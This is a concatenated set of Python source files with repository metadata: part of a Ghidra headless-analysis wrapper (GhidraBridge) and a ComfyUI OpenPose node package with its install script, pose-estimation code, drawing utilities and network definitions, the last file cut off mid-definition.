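# "-import <binary_path>" pair for "-process"; "-cspec"/"-processor" are appended only when
# those options are configured on the instance.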
def _hash_binary(self, binary_path):
with open(binary_path, 'rb') as f:
binary_hash = hashlib.sha256(f.read()).hexdigest()
return binary_hash
def run_string_script_on_binary(self, string_script, path_to_binary):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "script.py").resolve()
with open(script_path, "w") as file:
# Write some content to the file
file.write(string_script)
return self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
def get_all_function_names_and_addresses(self, path_to_binary):
script_contents = self.generate_get_function_names_and_address()
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
# Regular expression pattern to extract function names and addresses
pattern = r'Function: (\w+) - Address: (0x[\da-f]+)'
# Using re.findall to extract all matches
matches = re.findall(pattern, str(response))
# Create a dictionary to store the results
functions_dict = {}
# Populate the dictionary with extracted data
for match in matches:
function_name, address = match
functions_dict[function_name] = address
return functions_dict
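# Illustrative sketch (not executed): the headless output parsed above contains lines such as
#   Function: main - Address: 0x00101149
# so the returned dictionary maps each reported name to its entry-point string, e.g.
#   {"main": "0x00101149", "entry": "0x00101020"}
# (the addresses shown are made-up placeholders, not output from a real binary).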
def get_registers_for_function(self, path_to_binary, function):
script_contents = self.generate_script_for_getting_registers_for_function(function)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = str(self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash))
if "registers" not in response:
raise Exception("Script run uncuccessfully")
resp = response[response.find("registers_start")+len("registers_start"):response.rfind("registers")]
resp = resp.split(",")
registers = []
for register in resp:
register = register.strip("\n").strip(r"[").replace("[","").replace("]","").strip(r"]").strip("\\n").strip("'").strip().strip(" ")
registers.append(register)
return registers
def refactor_function_name(self, path_to_binary, old_function_name, new_function_name):
script_contents = self.generate_function_rename_script(old_function_name, new_function_name)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
return response
def decompile_binaries_functions(self, path_to_binary, decom_folder):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "decom_script.py").resolve()
self.generate_ghidra_decom_script(decom_folder, script_path)
self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
def get_list_of_reachable_functions(self, path_to_binary, function_name):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "script.py").resolve()
script_contents = self.generate_control_flow_script(function_name)
with open(script_path, "w") as file:
file.write(script_contents)
extracted_text = self._extract_text_between_delimiters(str(self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)))
list_of_functions = extracted_text[0].replace("\\n", "").strip("\\").strip(function_name).strip().split(" ")
return list_of_functions
def _extract_text_between_delimiters(self, text):
# Define the regular expression pattern to match text between ***
pattern = r'\*\*\*(.*?)\*\*\*'
# Use re.findall to find all matches in the text
matches = re.findall(pattern, text, re.DOTALL)
return matches
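# e.g. _extract_text_between_delimiters("pre *** main helper_a helper_b *** post")
# returns [' main helper_a helper_b '] -- an illustrative input, not real Ghidra output.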
def decompile_all_binaries_in_folder(self, path_to_folder, decom_folder):
# Create a list to store all the file paths
files_to_process = [file_path for file_path in Path(path_to_folder).iterdir() if file_path.is_file()]
# Use a ProcessPoolExecutor to execute the decompilation in parallel
with ProcessPoolExecutor() as executor:
# Create a list of futures
futures = [executor.submit(self.decompile_binaries_functions, file_path, decom_folder) for file_path in
files_to_process]
# Use tqdm to show progress
for _ in tqdm(concurrent.futures.as_completed(futures), total=len(files_to_process),
desc="Decompiling functions in binaries from {}".format(path_to_folder)):
pass
if __name__ == '__main__':
raise Exception("This is not a program entrypoint!")
| 26,567 | Python | .py | 598 | 35.769231 | 154 | 0.641777 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,110 | openpose_node.py | alessandrozonta_ComfyUI-OpenPose/openpose_node.py | import os
import torch
import cv2
import numpy as np
from .src import torch_openpose, util
from huggingface_hub import snapshot_download
from torchvision import transforms
# Define a transform to convert the image to a tensor
transform = transforms.ToTensor()
# find folder with models
def find_folder_upwards(start_dir, target_folder):
"""
Search for a target folder starting from a specified directory and moving upwards through the directory tree.
This function starts from the `start_dir` directory and searches for the `target_folder` in the current directory.
If it does not find the `target_folder`, it moves up one level in the directory hierarchy and repeats the process.
This continues until the `target_folder` is found or the root directory is reached.
Parameters:
start_dir (str): The directory to start the search from.
target_folder (str): The name of the folder to search for.
Returns:
str: The path to the target folder if found. None if the folder is not found.
Example:
>>> find_folder_upwards('/home/user/projects/my_project', 'models')
'/home/user/models'
>>> find_folder_upwards('/home/user/projects/my_project', 'non_existent_folder')
None
Note:
- This function assumes that `start_dir` is a valid directory path.
- If `start_dir` is already the root directory, the function will immediately return None if `target_folder` is not found in it.
"""
current_dir = start_dir
while True:
# Check if the target folder exists in the current directory
if target_folder in os.listdir(current_dir):
target_path = os.path.join(current_dir, target_folder)
if os.path.isdir(target_path):
return target_path
# Move up one level in the directory tree
parent_dir = os.path.dirname(current_dir)
if current_dir == parent_dir: # If current directory is root
return None
current_dir = parent_dir
def download_openpose_model_from_huggingface(model_name, output_directory):
"""Downloads an OpenPose model from the specified repository on Hugging Face Hub to the output directory.
Args:
model_name (str): The name of the model file to download (e.g., "body_25.pth" or "body_coco.pth").
output_directory (str): The directory to save the downloaded model file to. It is created if it does not exist.
Returns:
None. The model file is saved into `output_directory`; the download is skipped if the file is already present.
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory, exist_ok=True) # Create the output directory if it doesn't exist
# Downloading the model file from the specified URL using snapshot_download
repo_id = "alezonta/openpose"
# Check if the file exists
print("checking existence file")
file_exists = os.path.isfile(f"{output_directory}/{model_name}")
if not file_exists:
print("downloading model")
# The snapshot_download function is used to download the entire repository
# or specific files from it. In this case, we specify the repo_id and download the specific file.
snapshot_download(repo_id=repo_id, allow_patterns=model_name, local_dir=output_directory)
else:
print("model alredy downloaded")
class OpenPoseNode:
def __init__(self):
self.model_path = None # Initialize to None
self.model = None
@classmethod
def INPUT_TYPES(s):
return {
"required": {
"input_image": ("IMAGE",),
"typology": (["COCO", "BODY_25"],),
"transparency": ("FLOAT", {"default": 0.4, "min": 0, "max": 1, "step": 0.1}),
}
}
RETURN_TYPES = ("IMAGE", "IMAGE", "POSE_KEYPOINT")
RETURN_NAMES = ("image with keypoints", "keypoints only", "keypoints")
FUNCTION = "main"
CATEGORY = "OpenPose"
def main(self, input_image, typology, transparency):
# Check for valid typology
if typology not in ["COCO", "BODY_25"]:
raise ValueError(f"Invalid typology: {typology}")
model_name = "body_25.pth" if typology == "BODY_25" else "body_coco.pth"
# find path
model_path = find_folder_upwards(start_dir=os.getcwd(), target_folder="models")
self.model_path = f"{model_path}/openpose/{model_name}"
# load model
download_openpose_model_from_huggingface(model_name=model_name, output_directory=f"{model_path}/openpose/")
# Check if the input is a batch by looking at its first dimension
if len(input_image.shape) > 3 or input_image.shape[0] > 1:
# If it's a batch, take the first image
image = input_image[0]
else:
# If it's a single image, keep it as is
image = input_image
# remove the batch
image = image.squeeze(0)
# check if an alpha channel is present; if not, add one to the original image
if image.shape[2] != 4: # Check if image already has 4 channels (RGBA)
# Create an alpha channel with full opacity
alpha_channel = torch.ones(image.shape[0], image.shape[1], 1)
# Concatenate channels to create RGBA image
image = torch.cat((image, alpha_channel), dim=2)
# Load the selected model
self.model = torch_openpose.torch_openpose(typology.lower(), self.model_path) # Replace with actual path
# Normalize the float32 tensor to the range [0, 1]
float_tensor_normalized = (image - image.min()) / (image.max() - image.min())
# Scale the normalized tensor to the range [0, 255] and convert to torch.uint8
image = (float_tensor_normalized * 255).to(torch.uint8)
max_size = 1024
# Convert the tensor to a numpy array
numpy_image = image.cpu().numpy()
# Convert the numpy array to a cv2 image
cv2_image = cv2.cvtColor(numpy_image, cv2.COLOR_BGR2RGB)
# Get the dimensions of the image
height, width = cv2_image.shape[:2]
# Resize if necessary
if max(cv2_image.shape[:2]) > max_size:
# Determine the scaling factor
if height > width:
scaling_factor = 1024.0 / height
else:
scaling_factor = 1024.0 / width
# Resize the image
new_dimensions = (int(width * scaling_factor), int(height * scaling_factor))
resized_image = cv2.resize(cv2_image, new_dimensions, interpolation=cv2.INTER_AREA)
else:
resized_image = cv2_image
# Get keypoints using the loaded model
poses = self.model(resized_image)
# Draw keypoints
drawn_image = util.draw_bodypose(resized_image, poses, typology.lower(), transparency=transparency)
drawn_image = drawn_image.astype(np.float32) / 255
# only keypoints image
black_image = np.zeros_like(resized_image)
only_keypoints = util.draw_bodypose(black_image, poses, typology.lower())
only_keypoints = only_keypoints.astype(np.float32) / 255
# Resize back if necessary
if max(image.shape[:2]) > max_size:
drawn_image = cv2.resize(drawn_image, (cv2_image.shape[1], cv2_image.shape[0]), interpolation=cv2.INTER_AREA)
only_keypoints = cv2.resize(only_keypoints, (cv2_image.shape[1], cv2_image.shape[0]), interpolation=cv2.INTER_AREA)
# Apply the transform to the image
drawn_image = cv2.cvtColor(drawn_image, cv2.COLOR_RGB2BGR)
only_keypoints = cv2.cvtColor(only_keypoints, cv2.COLOR_RGB2BGR)
drawn_image = np.transpose(drawn_image, (1, 2, 0))
only_keypoints = np.transpose(only_keypoints, (1, 2, 0))
image_tensor = transform(drawn_image).unsqueeze(0)
only_keypoints = transform(only_keypoints).unsqueeze(0)
# Collect poses in the specified format
pose_data = {
'people': [{'pose_keypoints_2d': poses}],
'canvas_height': image_tensor.shape[1],
'canvas_width': image_tensor.shape[2]
}
# Convert back to torch image and return
return (image_tensor, only_keypoints, pose_data)
NODE_CLASS_MAPPINGS = {
"OpenPose - Get poses": OpenPoseNode
}
NODE_DISPLAY_NAME_MAPPINGS = {
"OpenPoseNode": "OpenPose - Get poses"
}
| 8,514 | Python | .py | 165 | 42.424242 | 132 | 0.655704 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,111 | install.py | alessandrozonta_ComfyUI-OpenPose/install.py | import subprocess
import sys
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
packages = [
"torch",
"opencv-python",
"numpy",
"huggingface_hub",
"torchvision"
]
for package in packages:
install(package)
print("All packages installed successfully.")
| 327 | Python | .py | 14 | 20.071429 | 76 | 0.705502 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,112 | torch_openpose.py | alessandrozonta_ComfyUI-OpenPose/src/torch_openpose.py | import cv2
import numpy as np
import math
from scipy.ndimage import gaussian_filter
import torch
from .util import padRightDownCorner
from .model import bodypose_model,bodypose_25_model
class torch_openpose(object):
def __init__(self, model_type, path_model):
if model_type == 'body_25':
self.model = bodypose_25_model()
self.njoint = 26
self.npaf = 52
self.model.load_state_dict(torch.load(path_model))
else:
self.model = bodypose_model()
self.njoint = 19
self.npaf = 38
self.model.load_state_dict(torch.load(path_model))
if torch.cuda.is_available():
self.model = self.model.cuda()
self.model.eval()
if self.njoint == 19: #coco
self.limbSeq = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], \
[9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], \
[0, 15], [15, 17]]
self.mapIdx = [[12, 13],[20, 21],[14, 15],[16, 17],[22, 23],[24, 25],[0, 1],[2, 3],\
[4, 5],[6, 7],[8, 9],[10, 11],[28, 29],[30, 31],[34, 35],[32, 33],\
[36, 37]]
elif self.njoint == 26: #body_25
self.limbSeq = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],\
[10,11],[8,12],[12,13],[13,14],[0,15],[0,16],[15,17],[16,18],\
[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
self.mapIdx = [[30, 31],[14, 15],[16, 17],[18, 19],[22, 23],[24, 25],[26, 27],[0, 1],[6, 7],\
[2, 3],[4, 5], [8, 9],[10, 11],[12, 13],[32, 33],[34, 35],[36,37],[38,39],\
[50,51],[46,47],[44,45],[40,41],[48,49],[42,43]]
def __call__(self, oriImg):
# scale_search = [0.5, 1.0, 1.5, 2.0]
scale_search = [0.5]
boxsize = 368
stride = 8
padValue = 128
thre1 = 0.1
thre2 = 0.05
multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search]
heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], self.njoint))
paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], self.npaf))
for m in range(len(multiplier)):
scale = multiplier[m]
imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
imageToTest_padded, pad = padRightDownCorner(imageToTest, stride, padValue)
im = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5
im = np.ascontiguousarray(im)
data = torch.from_numpy(im).float()
if torch.cuda.is_available():
data = data.cuda()
# data = data.permute([2, 0, 1]).unsqueeze(0).float()
with torch.no_grad():
heatmap, paf = self.model(data)
heatmap = heatmap.detach().cpu().numpy()
paf = paf.detach().cpu().numpy()
# extract outputs, resize, and remove padding
# heatmap = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[1]].data), (1, 2, 0)) # output 1 is heatmaps
heatmap = np.transpose(np.squeeze(heatmap), (1, 2, 0)) # output 1 is heatmaps
heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC)
heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
# paf = np.transpose(np.squeeze(net.blobs[output_blobs.keys()[0]].data), (1, 2, 0)) # output 0 is PAFs
paf = np.transpose(np.squeeze(paf), (1, 2, 0)) # output 0 is PAFs
paf = cv2.resize(paf, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC)
paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
heatmap_avg = heatmap_avg + heatmap / len(multiplier)
paf_avg = paf_avg + paf / len(multiplier)
all_peaks = []
peak_counter = 0
for part in range(self.njoint - 1):
map_ori = heatmap_avg[:, :, part]
one_heatmap = gaussian_filter(map_ori, sigma=3)
map_left = np.zeros(one_heatmap.shape)
map_left[1:, :] = one_heatmap[:-1, :]
map_right = np.zeros(one_heatmap.shape)
map_right[:-1, :] = one_heatmap[1:, :]
map_up = np.zeros(one_heatmap.shape)
map_up[:, 1:] = one_heatmap[:, :-1]
map_down = np.zeros(one_heatmap.shape)
map_down[:, :-1] = one_heatmap[:, 1:]
peaks_binary = np.logical_and.reduce(
(one_heatmap >= map_left, one_heatmap >= map_right, one_heatmap >= map_up, one_heatmap >= map_down, one_heatmap > thre1))
peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse
peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
peak_id = range(peak_counter, peak_counter + len(peaks))
peaks_with_score_and_id = [peaks_with_score[i] + (peak_id[i],) for i in range(len(peak_id))]
all_peaks.append(peaks_with_score_and_id)
peak_counter += len(peaks)
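# At this point all_peaks[part] holds one tuple per detected peak of that body part, in the
# form (x, y, heatmap_score, global_peak_id), e.g. [(212, 84, 0.91, 0), (318, 86, 0.88, 1)]
# (the coordinates and scores above are illustrative values, not output from a real image).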
# find connections between joint candidates following the limb sequence defined for this model
limbSeq = self.limbSeq
# the middle joints heatmap correspondence
mapIdx = self.mapIdx
connection_all = []
special_k = []
mid_num = 10
for k in range(len(mapIdx)):
score_mid = paf_avg[:, :, mapIdx[k]]
candA = all_peaks[limbSeq[k][0]]
candB = all_peaks[limbSeq[k][1]]
nA = len(candA)
nB = len(candB)
indexA, indexB = limbSeq[k]
if (nA != 0 and nB != 0):
connection_candidate = []
for i in range(nA):
for j in range(nB):
vec = np.subtract(candB[j][:2], candA[i][:2])
norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1])
vec = np.divide(vec, norm)
startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num), \
np.linspace(candA[i][1], candB[j][1], num=mid_num)))
vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \
for I in range(len(startend))])
vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \
for I in range(len(startend))])
score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])
score_with_dist_prior = sum(score_midpts) / len(score_midpts) + min(
0.5 * oriImg.shape[0] / norm - 1, 0)
criterion1 = len(np.nonzero(score_midpts > thre2)[0]) > 0.8 * len(score_midpts)
criterion2 = score_with_dist_prior > 0
if criterion1 and criterion2:
connection_candidate.append(
[i, j, score_with_dist_prior, score_with_dist_prior + candA[i][2] + candB[j][2]])
connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True)
connection = np.zeros((0, 5))
for c in range(len(connection_candidate)):
i, j, s = connection_candidate[c][0:3]
if (i not in connection[:, 3] and j not in connection[:, 4]):
connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]])
if (len(connection) >= min(nA, nB)):
break
connection_all.append(connection)
else:
special_k.append(k)
connection_all.append([])
# last number in each row is the total parts number of that person
# the second last number in each row is the score of the overall configuration
subset = -1 * np.ones((0, self.njoint + 1))
candidate = np.array([item for sublist in all_peaks for item in sublist])
for k in range(len(mapIdx)):
if k not in special_k:
partAs = connection_all[k][:, 0]
partBs = connection_all[k][:, 1]
indexA, indexB = np.array(limbSeq[k])
for i in range(len(connection_all[k])): # = 1:size(temp,1)
found = 0
subset_idx = [-1, -1]
for j in range(len(subset)): # 1:size(subset,1):
if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]:
subset_idx[found] = j
found += 1
if found == 1:
j = subset_idx[0]
if subset[j][indexB] != partBs[i]:
subset[j][indexB] = partBs[i]
subset[j][-1] += 1
subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]
elif found == 2: # if found 2 and disjoint, merge them
j1, j2 = subset_idx
membership = ((subset[j1] >= 0).astype(int) + (subset[j2] >= 0).astype(int))[:-2]
if len(np.nonzero(membership == 2)[0]) == 0: # merge
subset[j1][:-2] += (subset[j2][:-2] + 1)
subset[j1][-2:] += subset[j2][-2:]
subset[j1][-2] += connection_all[k][i][2]
subset = np.delete(subset, j2, 0)
else: # as like found == 1
subset[j1][indexB] = partBs[i]
subset[j1][-1] += 1
subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]
# if find no partA in the subset, create a new subset
elif not found:
row = -1 * np.ones(self.njoint + 1)
row[indexA] = partAs[i]
row[indexB] = partBs[i]
row[-1] = 2
row[-2] = sum(candidate[connection_all[k][i, :2].astype(int), 2]) + connection_all[k][i][2]
subset = np.vstack([subset, row])
# delete some rows of subset which has few parts occur
deleteIdx = []
for i in range(len(subset)):
if subset[i][-1] < 4 or subset[i][-2] / subset[i][-1] < 0.4:
deleteIdx.append(i)
subset = np.delete(subset, deleteIdx, axis=0)
poses = []
for per in subset:
pose = []
for po in per[:-2]:
if po >= 0:
joint = list(candidate[int(po)][:3])
else:
joint = [0.,0.,0.]
pose.append(joint)
poses.append(pose)
return poses
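# The return value is a list with one entry per detected person; each entry holds
# (njoint - 1) joints and every joint is [x, y, score] in input-image pixel coordinates,
# with [0., 0., 0.] used for joints that were not detected.
# Hedged usage sketch (comments only; the model path below is an arbitrary example):
#   tp = torch_openpose('body_25', 'models/openpose/body_25.pth')
#   poses = tp(cv2.imread('photo.jpg'))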
| 11,585 | Python | .py | 201 | 40.800995 | 137 | 0.485082 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,113 | util.py | alessandrozonta_ComfyUI-OpenPose/src/util.py | import numpy as np
import math
import cv2
# draw the body keypoint and lims
def draw_bodypose(img, poses,model_type = 'coco', transparency=0.4):
stickwidth = 4
limbSeq = [[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], \
[9, 10], [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], \
[0, 15], [15, 17]]
njoint = 18
if model_type == 'body_25':
limbSeq = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],\
[10,11],[8,12],[12,13],[13,14],[0,15],[0,16],[15,17],[16,18],\
[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
njoint = 25
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0], [0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255], [85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85], [255,255,0], [255,255,85], [255,255,170],\
[255,255,255],[170,255,255],[85,255,255],[0,255,255]]
for i in range(njoint):
for n in range(len(poses)):
pose = poses[n][i]
if pose[2] <= 0:
continue
x, y = pose[:2]
cv2.circle(img, (int(x), int(y)), 4, colors[i], thickness=-1)
for pose in poses:
for limb,color in zip(limbSeq,colors):
p1 = pose[limb[0]]
p2 = pose[limb[1]]
if p1[2] <=0 or p2[2] <= 0:
continue
cur_canvas = img.copy()
X = [p1[1],p2[1]]
Y = [p1[0],p2[0]]
mX = np.mean(X)
mY = np.mean(Y)
length = ((X[0] - X[1]) ** 2 + (Y[0] - Y[1]) ** 2) ** 0.5
angle = math.degrees(math.atan2(X[0] - X[1], Y[0] - Y[1]))
polygon = cv2.ellipse2Poly((int(mY), int(mX)), (int(length / 2), stickwidth), int(angle), 0, 360, 1)
cv2.fillConvexPoly(cur_canvas, polygon, color)
img = cv2.addWeighted(img, transparency, cur_canvas, 1 - transparency, 0)
return img
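# draw_bodypose expects `poses` in the format produced by torch_openpose: a list of persons,
# each a list of [x, y, score] joints; joints and limbs whose score is <= 0 are skipped.
# `transparency` controls the cv2.addWeighted blend above: 0 draws the limbs fully opaque,
# 1 leaves only the original image (and the keypoint circles) visible.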
def padRightDownCorner(img, stride, padValue):
h = img.shape[0]
w = img.shape[1]
pad = 4 * [None]
pad[0] = 0 # up
pad[1] = 0 # left
pad[2] = 0 if (h % stride == 0) else stride - (h % stride) # down
pad[3] = 0 if (w % stride == 0) else stride - (w % stride) # right
img_padded = img
pad_up = np.tile(img_padded[0:1, :, :]*0 + padValue, (pad[0], 1, 1))
img_padded = np.concatenate((pad_up, img_padded), axis=0)
pad_left = np.tile(img_padded[:, 0:1, :]*0 + padValue, (1, pad[1], 1))
img_padded = np.concatenate((pad_left, img_padded), axis=1)
pad_down = np.tile(img_padded[-2:-1, :, :]*0 + padValue, (pad[2], 1, 1))
img_padded = np.concatenate((img_padded, pad_down), axis=0)
pad_right = np.tile(img_padded[:, -2:-1, :]*0 + padValue, (1, pad[3], 1))
img_padded = np.concatenate((img_padded, pad_right), axis=1)
return img_padded, pad
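# Worked example: a 368x410 input with stride 8 yields pad = [0, 0, 0, 6] -- nothing is added
# on the top/left, and 6 columns of constant padValue pixels are appended on the right so
# both dimensions become multiples of the stride.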
| 3,048 | Python | .py | 61 | 40.163934 | 115 | 0.484154 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,114 | breakout25.py | alessandrozonta_ComfyUI-OpenPose/src/breakout25.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 28 15:13:51 2020
@author: joe
"""
import numpy as np
import math
jointpairs = [[1,0],[1,2],[2,3],[3,4],[1,5],[5,6],[6,7],[1,8],[8,9],[9,10],[10,11],[8,12],[12,13],[13,14],[0,15],[0,16]\
,[15,17],[16,18],[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
#[[1,0], [1,2], [2,3], [3,4], [1,5], [5,6], [6,7], [1,8], [8,9], [9,10],[10,11], [8,12],[12,13], [13,14], [0,15], [0,16]]
#[[30, 31],[14, 15],[16, 17],[18, 19],[22, 23],[24, 25],[26, 27],[0, 1],[6, 7],[2, 3],[4, 5], [8, 9],[10, 11],[12, 13],[32, 33],[34, 35]]
#[[15,17],[16,18],[11,24],[11,22],[14,21],[14,19],[22,23],[19,20]]
#[[36,37],[38,39],[50,51],[46,47],[44,45],[40,41],[48,49],[42,43]]
map25 = [[i,i+1] for i in range(0,52,2)]
def findoutmappair(all_peaks,paf):
mid_num = 10
pairmap = []
for pair in jointpairs:
candA = all_peaks[pair[0]]
candB = all_peaks[pair[1]]
if len(candA) == 0 or len(candB) == 0:
pairmap.append([])
continue
candA = candA[0]
candB = candB[0]
startend = list(zip(np.linspace(candA[0], candB[0], num=mid_num), \
np.linspace(candA[1], candB[1], num=mid_num)))
vec = np.subtract(candB[:2], candA[:2])
norm = math.sqrt(vec[0] * vec[0] + vec[1] * vec[1])
vec = np.divide(vec, norm)
score = 0.
tmp = []
for mp in map25:
score_mid = paf[:,:,[mp[0],mp[1]]]
vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0] \
for I in range(len(startend))])
vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1] \
for I in range(len(startend))])
score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])
score_midpts = score_midpts.sum()
if score < score_midpts:
score = score_midpts
tmp = mp
if score > 0.5:
pairmap.append(tmp+[score,])
else:
pairmap.append([])
return pairmap
| 2,251 | Python | .py | 49 | 35.857143 | 138 | 0.472694 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,115 | model.py | alessandrozonta_ComfyUI-OpenPose/src/model.py | import torch
from collections import OrderedDict
import torch
import torch.nn as nn
def make_layers(block, no_relu_layers,prelu_layers = []):
layers = []
for layer_name, v in block.items():
if 'pool' in layer_name:
layer = nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])
layers.append((layer_name, layer))
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers.append((layer_name, conv2d))
if layer_name not in no_relu_layers:
if layer_name not in prelu_layers:
layers.append(('relu_'+layer_name, nn.ReLU(inplace=True)))
else:
layers.append(('prelu'+layer_name[4:],nn.PReLU(v[1])))
return nn.Sequential(OrderedDict(layers))
def make_layers_Mconv(block,no_relu_layers):
modules = []
for layer_name, v in block.items():
layers = []
if 'pool' in layer_name:
layer = nn.MaxPool2d(kernel_size=v[0], stride=v[1],
padding=v[2])
layers.append((layer_name, layer))
else:
conv2d = nn.Conv2d(in_channels=v[0], out_channels=v[1],
kernel_size=v[2], stride=v[3],
padding=v[4])
layers.append((layer_name, conv2d))
if layer_name not in no_relu_layers:
layers.append(('Mprelu'+layer_name[5:], nn.PReLU(v[1])))
modules.append(nn.Sequential(OrderedDict(layers)))
return nn.ModuleList(modules)
class bodypose_25_model(nn.Module):
def __init__(self):
super(bodypose_25_model,self).__init__()
# these layers have no relu layer
no_relu_layers = ['Mconv7_stage0_L1','Mconv7_stage0_L2',\
'Mconv7_stage1_L1', 'Mconv7_stage1_L2',\
'Mconv7_stage2_L2', 'Mconv7_stage3_L2']
prelu_layers = ['conv4_2','conv4_3_CPM','conv4_4_CPM']
blocks = {}
block0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3_CPM', [512, 256, 3, 1, 1]),
('conv4_4_CPM', [256, 128, 3, 1, 1])
])
self.model0 = make_layers(block0, no_relu_layers,prelu_layers)
#L2
#stage0
blocks['Mconv1_stage0_L2'] = OrderedDict([
('Mconv1_stage0_L2_0',[128,96,3,1,1]),
('Mconv1_stage0_L2_1',[96,96,3,1,1]),
('Mconv1_stage0_L2_2',[96,96,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage0_L2' % i] = OrderedDict([
('Mconv%d_stage0_L2_0' % i,[288,96,3,1,1]),
('Mconv%d_stage0_L2_1' % i,[96,96,3,1,1]),
('Mconv%d_stage0_L2_2' % i,[96,96,3,1,1])
])
